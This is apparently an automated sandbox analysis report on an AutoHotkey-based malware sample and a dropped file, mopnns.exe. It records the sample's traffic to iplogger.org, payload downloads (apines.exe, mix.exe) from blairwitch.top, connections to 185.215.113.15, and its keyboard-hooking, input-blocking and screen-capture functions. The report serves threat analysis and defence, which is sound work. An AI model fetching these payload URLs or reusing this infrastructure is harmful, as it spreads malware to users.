                        Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownDNS traffic detected: queries for: iplogger.org
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004545D0 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW,0_2_004545D0
                        Source: global trafficHTTP traffic detected: GET /1mjvg7 HTTP/1.1Cache-Control: no-cache, no-storeConnection: Keep-AlivePragma: no-cacheAccept: */*If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTUser-Agent: ( Windows 10 Enterprise | x64 | Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz | Windows Defender | Chrome )Host: iplogger.org
                        Source: global trafficHTTP traffic detected: GET /1mhvg7 HTTP/1.1Cache-Control: no-cache, no-storeConnection: Keep-AlivePragma: no-cacheAccept: */*If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTUser-Agent: ( Windows 10 Enterprise | x64 | Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz | Windows Defender | Chrome )Host: iplogger.org
                        Source: global trafficHTTP traffic detected: GET /jollion/apines.exe HTTP/1.1User-Agent: AutoHotkeyHost: blairwitch.topCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /work/mix.exe HTTP/1.1User-Agent: AutoHotkeyHost: blairwitch.topCache-Control: no-cache
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:23:39 GMTServer: Apache/2.4.38 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 6c 61 69 72 77 69 74 63 68 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at blairwitch.top Port 80</address></body></html>
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.15
                        Source: mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: rm9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: unknownHTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49766 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49769 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Contains functionality to register a low level keyboard hookShow sources
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_00409200 SetWindowsHookExW 0000000D,Function_00004BF0,00400000,000000000_2_00409200
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0040F250 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,0_2_0040F250
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0043A490 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,0_2_0043A490
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004013F4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,0_2_004013F4
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0040F250 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,0_2_0040F250
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0040F686 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,_free,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,0_2_0040F686

                        System Summary:

                        barindex
                        Sample or dropped binary is a compiled AutoHotkey binaryShow sources
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeWindow found: window name: AutoHotkeyJump to behavior
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004013F40_2_004013F4
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004081400_2_00408140
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004201C00_2_004201C0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0040F2500_2_0040F250
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004422600_2_00442260
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004922620_2_00492262
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0048E2B00_2_0048E2B0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004183E00_2_004183E0
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004824050_2_00482405
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0041C4300_2_0041C430
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0043A4900_2_0043A490
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0048949E0_2_0048949E
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0043F5600_2_0043F560
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0040C5300_2_0040C530
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0049D58D0_2_0049D58D
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004826750_2_00482675
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004846200_2_00484620
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004966C50_2_004966C5
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_004996AF0_2_004996AF
                        Source: C:\Users\user\Desktop\VYeSXonMT1.exeCode function: 0_2_0040D7700_2_0040D770
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00408C604_2_00408C60
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_0040DC114_2_0040DC11
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00407C3F4_2_00407C3F
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00418CCC4_2_00418CCC
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00406CA04_2_00406CA0
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_004028B04_2_004028B0
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_0041A4BE4_2_0041A4BE
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_004182444_2_00418244
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_004016504_2_00401650
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00402F204_2_00402F20
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_004193C44_2_004193C4
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_004187884_2_00418788
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00402F894_2_00402F89
                        Source: C:\Users\user\AppData\Roaming\blair\mopnns.exeCode function: 4_2_00402B904_2_00402